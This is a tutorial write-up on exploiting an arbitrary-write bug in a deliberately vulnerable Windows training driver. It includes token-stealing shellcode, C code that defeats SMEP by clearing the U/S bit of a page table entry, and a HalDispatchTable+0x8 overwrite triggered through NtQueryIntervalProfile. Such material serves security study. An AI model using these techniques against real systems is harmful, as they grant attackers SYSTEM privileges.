
Exploiting Arbitrary Write

Intro

Recently I have taken an interest in Windows kernel exploitation and came across this GitHub repo. It covers many different kinds of exploitation techniques in the Windows kernel. This write-up, and the ones to follow, walk through solving some of the challenges in this project. A big thanks to the creators of this project.

As the headline states, this write up will be about exploiting an Arbitrary Write.

Communicating with the driver

To start with, we need to find the symbolic link in order to talk to the device object of the driver. Looking at winobj from Sysinternals, we can see the following record-

Next we will take a look at IDA in order to find the IOCTL code we need to trigger the arbitrary write handler.

The value of the IOCTL is 0x0022200B.
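It can help to see what this number encodes. Windows I/O control codes pack four fields into 32 bits (the layout produced by the CTL_CODE macro). The sketch below decodes them in plain, portable C; the struct and function names are my own and are not part of the driver or the Windows headers.

```c
#include <stdint.h>

/* Fields of a Windows I/O control code, as laid out by the CTL_CODE macro:
 * bits 31..16 device type, 15..14 required access, 13..2 function, 1..0 method. */
typedef struct {
    uint32_t device_type;
    uint32_t access;
    uint32_t function;
    uint32_t method;
} ioctl_fields;

/* Splits a 32-bit IOCTL code into its four fields. */
static ioctl_fields decode_ioctl(uint32_t code)
{
    ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFF;
    f.access      = (code >> 14) & 0x3;
    f.function    = (code >> 2)  & 0xFFF;
    f.method      = code & 0x3;
    return f;
}

/* Rebuilds a code from its fields (same arithmetic as CTL_CODE). */
static uint32_t encode_ioctl(ioctl_fields f)
{
    return (f.device_type << 16) | (f.access << 14) | (f.function << 2) | f.method;
}
```

For 0x0022200B this gives device type 0x22 (FILE_DEVICE_UNKNOWN), function 0x802, access 0 (FILE_ANY_ACCESS) and method 3 (METHOD_NEITHER). METHOD_NEITHER is worth noticing: the I/O manager does not buffer the request, so the driver receives our user-mode pointer as is.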

Code Overview

Let’s start by looking at ArbitraryWrite.c. It has a function called TriggerArbitraryWrite that takes one argument -

NTSTATUS
TriggerArbitraryWrite(
    _In_ PWRITE_WHAT_WHERE UserWriteWhatWhere
)

If we take a look at the ArbitraryWrite.h header file, we can see the following struct -

typedef struct _WRITE_WHAT_WHERE
{
    PULONG_PTR What;
    PULONG_PTR Where;
} WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;

It consists of two pointers, What and Where. The What pointer holds the address of the data that we want to write, and the Where pointer holds the address in memory that we want to write that data to.

The rest of the function looks like this-

We can see a call to ProbeForRead, which verifies that the UserWriteWhatWhere buffer actually resides in the user portion of the address space and is correctly aligned. Note that this check covers only the structure itself, not the What and Where pointers stored inside it. Then we see *v2 = *v1, which performs the actual copy of the data.

Analysing The Vulnerability

Now that we have gone over the code, let’s understand where and why it is vulnerable. As the comment inside the code states:

This is a vanilla Arbitrary Memory Overwrite vulnerability because the developer is writing the value pointed by ‘What’ to memory location pointed by ‘Where’ without properly validating if the values pointed by ‘Where’ and ‘What’ resides in User mode.
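To make the primitive concrete, here is a minimal user-space model of it. This is not the driver's code: the struct and function names are hypothetical, and everything happens inside one process. It only illustrates that a single unchecked `*Where = *What` gives us a write when we control What's contents, and a read when we point Where at our own variable.

```c
#include <stdint.h>

/* User-space stand-in for the driver's WRITE_WHAT_WHERE structure. */
typedef struct {
    uint64_t *What;   /* address the value is read from */
    uint64_t *Where;  /* address the value is written to */
} write_what_where;

/* Models the vulnerable statement: both pointers are dereferenced
 * without any validation of where they point. */
static void trigger_arbitrary_write(const write_what_where *req)
{
    *req->Where = *req->What;
}

/* "Write" direction: store a value we control at a chosen target address. */
static void primitive_write(uint64_t *target, uint64_t value)
{
    write_what_where req = { &value, target };
    trigger_arbitrary_write(&req);
}

/* "Read" direction: point What at the target and Where at our own variable. */
static uint64_t primitive_read(uint64_t *target)
{
    uint64_t out = 0;
    write_what_where req = { target, &out };
    trigger_arbitrary_write(&req);
    return out;
}
```

In the real exploit the target addresses are kernel addresses and the copy is performed by the driver at CPL=0, which is what makes the primitive dangerous.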

Exploiting The Vulnerability

So, we have reviewed the code and understood the vulnerability; now it’s time to write our exploit. We are going to write the exploit for Windows 10 x64 RS1. I chose this version because with each new RS release Microsoft added more mitigations that make kernel exploits harder to develop. Starting from RS2, Microsoft introduced kCFG, which stands for “Kernel Control Flow Guard”. This mitigation validates the targets of indirect calls and makes sure the memory location in which the called function resides is legitimate. We won’t get into how to bypass kCFG here, but I will say it’s possible, and hopefully in the next write-up we will be facing a higher RS version.

In this write up we are going to deal with the following mitigations -

  • kASLR (Kernel Address Space Layout Randomization).
  • Page Table Randomization.
  • NX (No Execute).
  • SMEP (Supervisor Mode Execution Prevention).

The steps we are going to follow are:

  1. Write shellcode that will steal the system access token and assign it to our process.
  2. Allocate an RWX memory region in user mode for our shellcode.
  3. Change the U/S bit of the PTE that maps the page holding our shellcode.
  4. Modify one of the pointers inside HalDispatchTable to point to our user mode shellcode.
  5. Make a syscall that triggers the use of HalDispatchTable, which will then execute our shellcode in kernel mode.

Don’t worry if you don’t understand any of the steps, they will be explained later on.

Shellcode

I am going to use a common generic shellcode that will copy the system access token to our process.
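Before the assembly, it may help to see the same logic in C. The sketch below runs on a simulated process list: `fake_eprocess` is a hypothetical, simplified stand-in for _EPROCESS, and its field offsets have nothing to do with the real structure. Unlike the shellcode, it also stops if the walk wraps around without finding PID 4.

```c
#include <stdint.h>
#include <stddef.h>

typedef struct list_entry {
    struct list_entry *Flink;
    struct list_entry *Blink;
} list_entry;

/* Simplified, hypothetical stand-in for _EPROCESS; real offsets differ. */
typedef struct {
    uint64_t   UniqueProcessId;
    list_entry ActiveProcessLinks;
    uint64_t   Token;              /* _EX_FAST_REF: low 4 bits hold RefCnt */
} fake_eprocess;

/* Recovers the owning process from a pointer to its ActiveProcessLinks
 * (the C equivalent of the "sub rbx, <offset>" step in the shellcode). */
#define FROM_LINKS(p) \
    ((fake_eprocess *)((char *)(p) - offsetof(fake_eprocess, ActiveProcessLinks)))

/* Walks the circular list starting after `current` until PID 4 is found,
 * then copies its token with the RefCnt bits cleared.
 * Returns 0 on success, -1 if the walk wrapped around. */
static int steal_system_token(fake_eprocess *current)
{
    fake_eprocess *p = current;
    do {
        p = FROM_LINKS(p->ActiveProcessLinks.Flink);
        if (p->UniqueProcessId == 4) {
            current->Token = p->Token & ~(uint64_t)0xF;
            return 0;
        }
    } while (p != current);
    return -1;
}
```

The real shellcode does the same thing with hard-coded offsets for the target Windows build, which is why it has to be adjusted for each version.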

[BITS 64]
_start:
	mov rax, [gs:0x188]		; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]		; Current process (_EPROCESS)
	mov rbx, rax			; Copy current process (_EPROCESS) to rbx
__loop:
	mov rbx, [rbx + 0x2f0] 		; ActiveProcessLinks
	sub rbx, 0x2f0			; Go back to current process (_EPROCESS)
	mov rcx, [rbx + 0x2e8] 		; UniqueProcessId (PID)
	cmp rcx, 4 			; Compare PID to SYSTEM PID
	jnz __loop			; Loop until SYSTEM PID is found
	mov rcx, [rbx + 0x358]		; SYSTEM token is @ offset _EPROCESS + 0x358
	and cl, 0xf0			; Clear out _EX_FAST_REF RefCnt
	mov [rax + 0x358], rcx		; Copy SYSTEM token to current process
	xor rax, rax			; STATUS_SUCCESS
	ret				; Done!

char payload[] = "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"
	"\x48\x8B\x80\xB8\x00\x00\x00"
	"\x48\x89\xC3\x48\x8B\x9B\xF0\x02\x00\x00"
	"\x48\x81\xEB\xF0\x02\x00\x00"
	"\x48\x8B\x8B\xE8\x02\x00\x00"
	"\x48\x83\xF9\x04\x75\xE5"
	"\x48\x8B\x8B\x58\x03\x00\x00"
	"\x80\xE1\xF0\x48\x89\x88\x58\x03\x00\x00"
	"\x48\x31\xC0\xC3";

Allocating rwx memory in user mode

Here we allocate a rwx memory region for our shellcode.

void* shellcode = VirtualAlloc(
	NULL, // Address (let the system choose).
	sizeof(payload), // Size.
	0x3000, // Allocation type: MEM_COMMIT | MEM_RESERVE.
	0x40 // Protection: PAGE_EXECUTE_READWRITE.
);

// Copy the payload into the allocated region in user mode.

RtlMoveMemory(
	shellcode,
	payload,
	sizeof(payload)
);

Changing U/S bit of the PTE

Remember I said that the kernel is going to execute our code from a memory region in user mode? Well, in order to do so we need to bypass SMEP.

What is SMEP?

SMEP, or Supervisor Mode Execution Prevention, is a CPU feature that raises a fault whenever the CPU tries to execute code from a user mode memory page while running at CPL=0, when the right CPL (Current Privilege Level) for that page is CPL=3. On Windows this results in a “Bug Check” with the following error message - ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY. We can see if SMEP is enabled by looking at bit 20 of cr4 -

In this case, it’s the 1 at the start.

This is documented in Intel’s manual, volume 3A, sections 2.5 (CR4.SMEP flag) and 4.6 (per memory page settings).
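Checking the flag is a one-bit test. A minimal sketch, where the helper name is my own and the cr4 values used with it are hypothetical examples rather than values taken from the debugger session above:

```c
#include <stdint.h>

#define CR4_SMEP_BIT 20  /* position of the SMEP flag in CR4 */

/* Returns 1 if the SMEP flag is set in the given CR4 value, 0 otherwise. */
static int smep_enabled(uint64_t cr4)
{
    return (int)((cr4 >> CR4_SMEP_BIT) & 1);
}
```

For instance, a cr4 value of 0x1506f8 has bit 20 set, while 0x0506f8 does not.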

So, when SMEP is enabled, the CPU checks the U/S flag of the page being executed, and if its value is 0 (supervisor) the CPU allows the code to execute at CPL=0. Notice that SMEP is enforced per page. In other words, once the U/S flag of our shellcode’s page is cleared, the kernel will be able to run the code even though it resides at a user mode address.

Alright, now that we have cleared up what SMEP is, it’s time to get our hands dirty and understand how to change the U/S flag of the PTE. I am assuming you know what a PTE is and how paging works, so I won’t get into that.

In order to modify the control flags of the PTE we first need to find the address of the PTE in memory. Remember that the base address from which we calculate it is randomized each time the OS reboots, so we need a way to find that base address dynamically.

nt!MiGetPteAddress

Quoting from “Connor McGarr” blog (link below) -

Windows has an API called nt!MiGetPteAddress that performs a specific formula to retrieve the associated PTE of a memory page.

The above function performs the following instructions:

  1. Bitwise shifts the contents of the RCX register to the right by 9 bits.
  2. Moves the value of 0x7FFFFFFFF8 into RAX.
  3. Bitwise AND’s the values of RCX and RAX together.
  4. Moves the value of 0FFFF818000000000 into RAX.
  5. Adds the values of RAX and RCX.
  6. Performs a return out of the function.

0FFFF818000000000 is a 64-bit address which is actually the base of the PTEs.
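The shift by 9 and the odd-looking mask are easier to read once you notice they are just "virtual page number times 8". The two functions below (names are my own) compute the same address; the second spells out the indexing.

```c
#include <stdint.h>

/* The form described in the steps above: shift right by 9, mask, add base. */
static uint64_t pte_address_shift9(uint64_t va, uint64_t pte_base)
{
    return ((va >> 9) & 0x7FFFFFFFF8ULL) + pte_base;
}

/* Same computation spelled out: take the 36-bit virtual page number
 * (address bits 47..12) and multiply by 8, the size of one PTE. */
static uint64_t pte_address_indexed(uint64_t va, uint64_t pte_base)
{
    uint64_t vpn = (va >> 12) & 0xFFFFFFFFFULL;
    return pte_base + vpn * 8;
}
```

With the base quoted above, the page at virtual address 0x1000 has its PTE at base + 8, and every address inside that page maps to the same PTE.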

You are probably asking yourself: how does this help us? The nice thing about “Write What Where” is that it can be used as an arbitrary read as well ;) We can find the offset of this function in the kernel and read the base address, which is stored at nt!MiGetPteAddress+0x13. This is how we will be able to dynamically calculate the address of our page’s PTE and change the U/S flag.
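Why +0x13? The PTE base is the 8-byte immediate operand of the second `mov rax, imm64`, and the instructions before it add up to 0x13 bytes. The byte array below is my own reconstruction of the function from the six steps listed above, an assumption rather than a dump from a real kernel, and the helper names are hypothetical. In the actual exploit the same 8 bytes are fetched through the driver by setting What to nt!MiGetPteAddress+0x13.

```c
#include <stdint.h>
#include <stddef.h>

/* Encoding reconstructed from the listed steps (assumption, not a kernel dump). */
static const uint8_t mi_get_pte_address_bytes[] = {
    0x48, 0xC1, 0xE9, 0x09,                                     /* +0x00 shr rcx, 9 */
    0x48, 0xB8, 0xF8, 0xFF, 0xFF, 0xFF, 0x7F, 0x00, 0x00, 0x00, /* +0x04 mov rax, 7FFFFFFFF8h */
    0x48, 0x23, 0xC8,                                           /* +0x0E and rcx, rax */
    0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x80, 0x81, 0xFF, 0xFF, /* +0x11 mov rax, 0FFFF818000000000h */
    0x48, 0x03, 0xC1,                                           /* +0x1B add rax, rcx */
    0xC3                                                        /* +0x1E ret */
};

/* Reads a little-endian 64-bit value from a byte buffer. */
static uint64_t read_qword_le(const uint8_t *p)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | p[i];
    return v;
}

/* The immediate of the second mov starts 2 bytes after its opcode at +0x11. */
static uint64_t pte_base_from_function(const uint8_t *func)
{
    return read_qword_le(func + 0x13);
}
```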

The offset of nt!MiGetPteAddress in Windows 10 RS1 is at kernel_base_address + 0x51214.

Time to write some code

Let’s do it with code (the following code snippets are heavily inspired by Connor’s blog, with a few cosmetic changes of mine) -

We will start by getting the base address of ntoskrnl.exe -

unsigned long long getKernelBaseAddress() {

	void* lpImageBase[1024];
	unsigned long lpcbNeeded;

	int baseOfDrivers = EnumDeviceDrivers(
		lpImageBase,
		sizeof(lpImageBase),
		&lpcbNeeded
	);

	if (!baseOfDrivers)
	{
		LOG("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %lu\n", GetLastError());
		exit(1);
	}

	// ntoskrnl.exe is the first module dumped in the array.
	unsigned long long kernelBaseAddress = (unsigned long long)lpImageBase[0];

	LOG("[+] ntoskrnl.exe is located at: 0x%llx\n", kernelBaseAddress);

	return kernelBaseAddress;
}

Then, we get the base address of the PTEs -

unsigned long long getBasePteAddress(HANDLE hDriver, unsigned long long kernelBaseAddress) {

	unsigned long long NtMiGetPteAddress = kernelBaseAddress + MI_PTE_GET_ADDRESS_OFFSET;

	// Defining a pointer to write the base of PTEs to. (must initialize pointer, hence placeholder).
	unsigned long long pteBaseAddressPlaceHolder = 0;
	PULONGLONG baseOfPtes = &pteBaseAddressPlaceHolder;

	// Defining buffer to send to driver
	char buffer[0x10];
	size_t oneQword = 0x8;

	// Initializing buffer to junk to satisfy type error of memset.
	memset(buffer, 0x41, 0x10);

	// Actual buffer for extracting the PTE base.
	memcpy(buffer, &NtMiGetPteAddress, oneQword);
	memcpy(&buffer[0x8], &baseOfPtes, oneQword);

	sendBufferToDriver(hDriver, buffer);

	LOG("[+] Base of the page table entries: 0x%llx\n", (unsigned long long) * baseOfPtes);

	return (unsigned long long) * baseOfPtes;
}

Now, let’s find the shellcode PTE -

unsigned long long getShellcodePTEAddress(unsigned long long baseOfPtes, void* shellcodeAddress) {

	// Bitwise operations to locate PTE of shellcode page
	unsigned long long shellcodePte = (unsigned long long)shellcodeAddress >> 9;
	shellcodePte = shellcodePte & 0x7FFFFFFFF8;
	return shellcodePte + baseOfPtes;
}

Read the control flags stored in that PTE, where the U/S bit can be found -

unsigned long long getShellcodePteControlFlagAddress(HANDLE hDriver, unsigned long long shellcodePte) {

	// Defining a pointer to extract shellcode's PTE control bits. (must initialize pointer, hence placeholder).
	unsigned long long placeholder = 0;
	PULONGLONG pteControlFlagsPointer = &placeholder;

	// Defining buffer to send to driver.
	char buffer[0x10];
	size_t oneQword = 0x8;

	// Initializing buffer to junk to satisfy type error of memset
	memset(buffer, 0x41, 0x10);

	// Actual buffer for extracting PTE control bits
	memcpy(buffer, &shellcodePte, oneQword);
	memcpy(&buffer[0x8], &pteControlFlagsPointer, oneQword);

	sendBufferToDriver(hDriver, buffer);

	LOG("[+] PTE control bits for shellcode page: 0x%llx\n", (unsigned long long) * pteControlFlagsPointer);

	return (unsigned long long) * pteControlFlagsPointer;
}

Lastly, let’s change the U/S flag -

void changeUSFlag(HANDLE hDriver, unsigned long long pteControlFlags , unsigned long long shellcodePte) {

	// Corrupting U/S bit in PTE to make user mode page become kernel mode.
	unsigned long long taintedPte;
	taintedPte = pteControlFlags & 0xFFFFFFFFFFFFFFFB;

	// Defining pointer for corrupted PTE bits.
	PULONGLONG taintedptePointer = &taintedPte;

	// Defining buffer to send to driver.
	char buffer[0x10];
	size_t oneQword = 0x8;

	// Initializing buffer to junk to satisfy type error of memset.
	memset(buffer, 0x41, 0x10);

	// Actual buffer for corrupting PTE.
	memcpy(buffer, &taintedptePointer, oneQword);
	memcpy(&buffer[0x8], &shellcodePte, oneQword);

	// Print update for corrupting PTE
	LOG("[+] Corrupting PTE of shellcode to make U/S bit kernel mode...\n");

	sendBufferToDriver(hDriver, buffer);
}
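The mask 0xFFFFFFFFFFFFFFFB is simply "all bits except bit 2". A small sketch with named flag bits makes that easier to see; the macro and function names are my own, and the PTE value in the usage note is a hypothetical example.

```c
#include <stdint.h>

/* Low control bits of an x64 page table entry. */
#define PTE_PRESENT  (1ULL << 0)
#define PTE_WRITABLE (1ULL << 1)
#define PTE_USER     (1ULL << 2)   /* U/S: 1 = user, 0 = supervisor */

/* Returns non-zero if the page is marked as a user mode page. */
static int pte_is_user(uint64_t pte)
{
    return (pte & PTE_USER) != 0;
}

/* Clears the U/S bit and leaves every other bit untouched. */
static uint64_t pte_make_supervisor(uint64_t pte)
{
    return pte & ~PTE_USER;
}
```

For a hypothetical PTE value of 0x12345867 the result is 0x12345863: only bit 2 changes, so the physical frame number and the other flags stay intact.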

So, at this point we can say “good bye” to SMEP and continue into modifying the pointer inside HalDispatchTable.

Modifying HalDispatchTable

From “Geoff Chappell” -

The HAL_DISPATCH structure is a table of pointers to optional HAL functionality. The kernel keeps the one instance of this table. It’s in the kernel’s read-write data section and its address is exported as HalDispatchTable. The table initially has the kernel’s built-in implementations of most (but not all) functions. Many are trivial. Some are substantial. The HAL overrides some. No known HAL overrides all. Functionality that has no meaning to a particular HAL is left to the kernel’s default (and HAL programmers are spared from writing even dummy code for nothing that matters to them). Moreover, since the address is exported, rather than communicated specifically to the HAL, it seems to have been intended all along that the functionality is exposed to other kernel-mode modules such as drivers not only for them to call but also to override further.

What we are going to do is overwrite one of the pointers and then make a syscall that will trigger the execution of the function to which the pointer points.

In order to modify the HalDispatchTable we first need to find the base address of ntoskrnl.exe, just as we did in the previous part. Once we have the base address, we need to know the offset of HalDispatchTable; in Windows 10 RS1 the offset is 0x2f43b8.

Now we will replace the pointer at offset HalDispatchTable+0x8. Why? The answer can be found in the disassembly of the nt!NtQueryIntervalProfile syscall -

kd> uf nt!NtQueryIntervalProfile
nt!NtQueryIntervalProfile:
fffff800`96584df0 48895c2408      mov     qword ptr [rsp+8],rbx
fffff800`96584df5 57              push    rdi
fffff800`96584df6 4883ec20        sub     rsp,20h
fffff800`96584dfa 488bda          mov     rbx,rdx
fffff800`96584dfd 65488b042588010000 mov   rax,qword ptr gs:[188h]
fffff800`96584e06 408ab832020000  mov     dil,byte ptr [rax+232h]
fffff800`96584e0d 4084ff          test    dil,dil
fffff800`96584e10 7419            je      nt!NtQueryIntervalProfile+0x3b (fffff800`96584e2b) Branch

nt!NtQueryIntervalProfile+0x22:
fffff800`96584e12 48b80000ffffff7f0000 mov rax,7FFFFFFF0000h
fffff800`96584e1c 483bd0          cmp     rdx,rax
fffff800`96584e1f 480f43d0        cmovae  rdx,rax
fffff800`96584e23 8b02            mov     eax,dword ptr [rdx]
fffff800`96584e25 8902            mov     dword ptr [rdx],eax
fffff800`96584e27 eb02            jmp     nt!NtQueryIntervalProfile+0x3b (fffff800`96584e2b) Branch

nt!NtQueryIntervalProfile+0x3b:
fffff800`96584e2b e81c000000      call    nt!KeQueryIntervalProfile (fffff800`96584e4c)
fffff800`96584e30 4084ff          test    dil,dil
fffff800`96584e33 7411            je      nt!NtQueryIntervalProfile+0x56 (fffff800`96584e46) Branch

nt!NtQueryIntervalProfile+0x45:
fffff800`96584e35 8903            mov     dword ptr [rbx],eax
fffff800`96584e37 eb00            jmp     nt!NtQueryIntervalProfile+0x49 (fffff800`96584e39) Branch

nt!NtQueryIntervalProfile+0x49:
fffff800`96584e39 33c0            xor     eax,eax
fffff800`96584e3b 488b5c2430      mov     rbx,qword ptr [rsp+30h]
fffff800`96584e40 4883c420        add     rsp,20h
fffff800`96584e44 5f              pop     rdi
fffff800`96584e45 c3              ret

nt!NtQueryIntervalProfile+0x56:
fffff800`96584e46 8903            mov     dword ptr [rbx],eax
fffff800`96584e48 ebef            jmp     nt!NtQueryIntervalProfile+0x49 (fffff800`96584e39) Branch

Inside that function we can see a call is being made to nt!KeQueryIntervalProfile -

kd> uf nt!KeQueryIntervalProfile
nt!KeQueryIntervalProfile:
fffff800`96584e4c 4883ec48        sub     rsp,48h
fffff800`96584e50 83f901          cmp     ecx,1
fffff800`96584e53 7430            je      nt!KeQueryIntervalProfile+0x39 (fffff800`96584e85) Branch

nt!KeQueryIntervalProfile+0x9:
fffff800`96584e55 ba18000000      mov     edx,18h
fffff800`96584e5a 894c2420        mov     dword ptr [rsp+20h],ecx
fffff800`96584e5e 4c8d4c2450      lea     r9,[rsp+50h]
fffff800`96584e63 4c8d442420      lea     r8,[rsp+20h]
fffff800`96584e68 8d4ae9          lea     ecx,[rdx-17h]
fffff800`96584e6b ff15c714deff    call    qword ptr [nt!HalDispatchTable+0x8 (fffff800`96366338)]
fffff800`96584e71 85c0            test    eax,eax
fffff800`96584e73 7818            js      nt!KeQueryIntervalProfile+0x41 (fffff800`96584e8d) Branch

nt!KeQueryIntervalProfile+0x29:
fffff800`96584e75 807c242400      cmp     byte ptr [rsp+24h],0
fffff800`96584e7a 7411            je      nt!KeQueryIntervalProfile+0x41 (fffff800`96584e8d) Branch

nt!KeQueryIntervalProfile+0x30:
fffff800`96584e7c 8b442428        mov     eax,dword ptr [rsp+28h]

nt!KeQueryIntervalProfile+0x34:
fffff800`96584e80 4883c448        add     rsp,48h
fffff800`96584e84 c3              ret

nt!KeQueryIntervalProfile+0x39:
fffff800`96584e85 8b0595c2dfff    mov     eax,dword ptr [nt!KiProfileAlignmentFixupInterval (fffff800`96381120)]
fffff800`96584e8b ebf3            jmp     nt!KeQueryIntervalProfile+0x34 (fffff800`96584e80) Branch

nt!KeQueryIntervalProfile+0x41:
fffff800`96584e8d 33c0            xor     eax,eax
fffff800`96584e8f ebef            jmp     nt!KeQueryIntervalProfile+0x34 (fffff800`96584e80) Branch

Here, we can see a call to HalDispatchTable+0x8. There we will put our pointer.
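The effect of overwriting a dispatch slot can be modelled entirely in user space. In the sketch below every name is hypothetical: `fake_hal_dispatch` is a two-field stand-in for the real table, and `query_interval_profile` plays the role of the `call qword ptr [nt!HalDispatchTable+0x8]` instruction.

```c
#include <stdint.h>

typedef int (*dispatch_fn)(void);

/* Hypothetical stand-in for the start of the dispatch table. */
typedef struct {
    uint64_t    version;     /* offset 0x0 */
    dispatch_fn query_slot;  /* offset 0x8: the slot the kernel calls through */
} fake_hal_dispatch;

/* The legitimate handler initially installed in the slot. */
static int original_handler(void)
{
    return 0;
}

/* Stands in for our shellcode. */
static int attacker_payload(void)
{
    return 0x1337;
}

static fake_hal_dispatch fake_table = { 1, original_handler };

/* Models the indirect call: whatever pointer sits in the slot gets executed. */
static int query_interval_profile(void)
{
    return fake_table.query_slot();
}
```

Assigning `fake_table.query_slot = attacker_payload;` is the user-space equivalent of the write-what-where in the real exploit; the next call to `query_interval_profile()` then runs the payload instead of the original handler.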

It’s time to write the final part of the exploit -

void modifyHalDispatchTable(unsigned long long kernelBaseAddress, HANDLE hDriver, void* shellcode) {

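	// The write must land on the slot at nt!HalDispatchTable+0x8. HAL_DISPATCH_TABLE_OFFSET is
	// assumed to already include that +0x8; if it holds the offset of the table itself, add 0x8 here.
	unsigned long long halDispatchTable = kernelBaseAddress + HAL_DISPATCH_TABLE_OFFSET;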

	// Defining buffer to send to driver.
	char buffer[0x10];
	size_t oneQword = 0x8;

	// Initializing buffer to junk to satisfy type error of memset.
	memset(buffer, 0x41, 0x10);

	// Actual buffer for overwriting [nt!HalDispatchTable+0x8] with shellcode address.
	memcpy(buffer, &shellcode, oneQword);
	memcpy(&buffer[0x8], &halDispatchTable, oneQword);

	sendBufferToDriver(hDriver, buffer);

	printf("[+] Overwrote [nt!HalDispatchTable+0x8] with shellcode address...\n");
}

In the above, we are modifying the HalDispatchTable with a pointer to our shellcode.

void triggerExploit() {

	// Locating nt!NtQueryIntervalProfile.
	NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
		GetModuleHandle(
			TEXT("ntdll.dll")),
		"NtQueryIntervalProfile"
	);

	// Error handling.
	if (!NtQueryIntervalProfile)
	{
		printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
		exit(1);
	}

	// Print update for found ntdll!NtQueryIntervalProfile.
	printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", (unsigned long long)NtQueryIntervalProfile);

	// Invoking nt!NtQueryIntervalProfile to execute [nt!HalDispatchTable+0x8]
	printf("[+] Calling nt!NtQueryIntervalProfile to execute [nt!HalDispatchTable+0x8]...\n");

	// Calling nt!NtQueryIntervalProfile.
	ULONG exploit = 0;

	NtQueryIntervalProfile(
		0x1234,
		&exploit
	);
}

That’s it, our process is now running with a system token!

Wrapping up

In this write-up we saw how to exploit an arbitrary “Write What Where” in the Windows kernel. As I said above, there are many different mitigations in the latest versions of Windows 10, and it gets even harder when VBS is in place. Here I have shown how to bypass some of the mitigations, like SMEP and Page Table Randomization. There are more ways to bypass those mitigations than the ones I have shown.

Sources